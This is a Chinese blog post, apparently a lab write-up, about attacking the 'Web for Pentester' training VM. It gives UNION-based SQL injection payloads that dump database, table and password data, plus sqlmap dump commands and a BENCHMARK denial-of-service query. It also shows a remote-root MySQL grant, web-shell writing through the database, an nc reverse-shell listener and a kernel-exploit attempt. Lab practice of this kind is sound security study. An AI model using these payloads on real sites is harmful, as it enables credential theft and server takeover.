首页 > 数据库技术 > 详细

web_pentester_sql_1

时间:2020-09-25 20:58:37      阅读:9      评论:0      收藏:0      [点我收藏+]

标签:start   ddr   t权限   column   输出   分享   

数据库MySQL

靶机系统Debian 6

实验环境 web_pentester

手工注入

发现是 ’ 闭合

判断有几个回显

admin’ order by 5--+ 发现有5个回显

查看显示位置

0’ union select 1,2,3,4,5--+ 这里第一个数值不一定是0,只要是数据库不存在的数值就行

发现回显是1,2,3

admin‘ union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4,5--+ 获取的数据库

admin‘ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5--+  ‘exercises‘   这里的database可以换成exercises    获取库中的表名

admin‘ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘),3,4,5--+  获取表中的字段

admin‘ union select id,name,passwd,4,5 from users--+     获取字段内容

 

Sqlmap工具注入

Sqlmap用于 mysql中DDOS攻击

sqlmap -u "url" --sql-shell

select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

sqlmap -u ‘url‘ 查看是否能注入

sqlmap -u "url" --dbs 查找数据库

sqlmap -u "url" -D user --tables  (假如数据库名为user)

sqlmap -u "url" -D user -T exercises --columns  (假如表为exercises)

 sqlmap -u "url" -D user -T exercises -C "name,passwd" --dump  获取字段地值

 

Mysql开启远程连接(对于这个靶场来说没什么用)

vim /etc/mysql/my.cnf   将里面地bind-address = 127.0.0.1  删掉或者注释掉或者改为0.0.0.0

当然这里也可以改端口号,这里就不说了

登录mysql

mysql -u root -p root

允许任何人来远程连接

grant all on *.*  to [email protected]‘%‘ identified by ‘root‘ with grant option;

这句话意思是用户名为root 密码为root的都可以进行远程连接

然后重新启动mysql服务器就行了

service mysql restart

 

查看数据库中的这个表(注意以下操作数据库用户都是root权限,权限比较大)

SHOW VARIABLES LIKE "secure_file_priv";

里面如果为NULL就说明不能上传文件,如果为路径就可以在指定路径上传文件

如果里面为空则说明里面可以上传文件,就可以使用udf或者把shell写入到数据库然后用数据库输出文件将shell反弹提权(但是这样需要该文件夹有任何人读写的权限)

获取这个靶场的目录只需要将 url ?后面的东西去掉就可以了

技术分享图片

 

 

 

我觉得可能是权限问题,我用udf和数据库写入文件都不能成功,我改了下权限在试试

技术分享图片

 

 

 

数据库写入文件成功

 技术分享图片

我在试试udf

找到插件的位置

show variables like "%plugin%";

我的是   /usr/lib/mysql/plugin

技术分享图片

看来其他用户也没有写入文件的权限,赋予其他用户权限后发现可以上传文件了

 技术分享图片

 

 

 技术分享图片是在创建函数的时候会出现以下问题,如果有大佬知道怎么回事的话,请告诉我谢谢

 技术分享图片

看来以现在的能力只能利用数据库读写文件了,写入shell文件之后,使用

nc -lvp 4444(我设置的端口号为4444)

查看内核版

 技术分享图片

查找下是否有内核溢出漏洞

 技术分享图片

编译的时候需要加上pthread

 技术分享图片

然后虽然编辑出来了程序但是不能执行报出以下错误,希望大佬看见能指出问题

 技术分享图片

然后暴力破解我就不试了,我自己的靶场暴力破解就没意义了

web_pentester_sql_1

标签:start   ddr   t权限   column   输出   分享   

原文:https://www.cnblogs.com/zhao-yang/p/13731812.html

(0)
(0)
   
举报
评论 一句话评论(0
© 2014 bubuko.com 版权所有 鲁ICP备09046678号-4
打开技术之扣,分享程序人生!
             

鲁公网安备 37021202000002号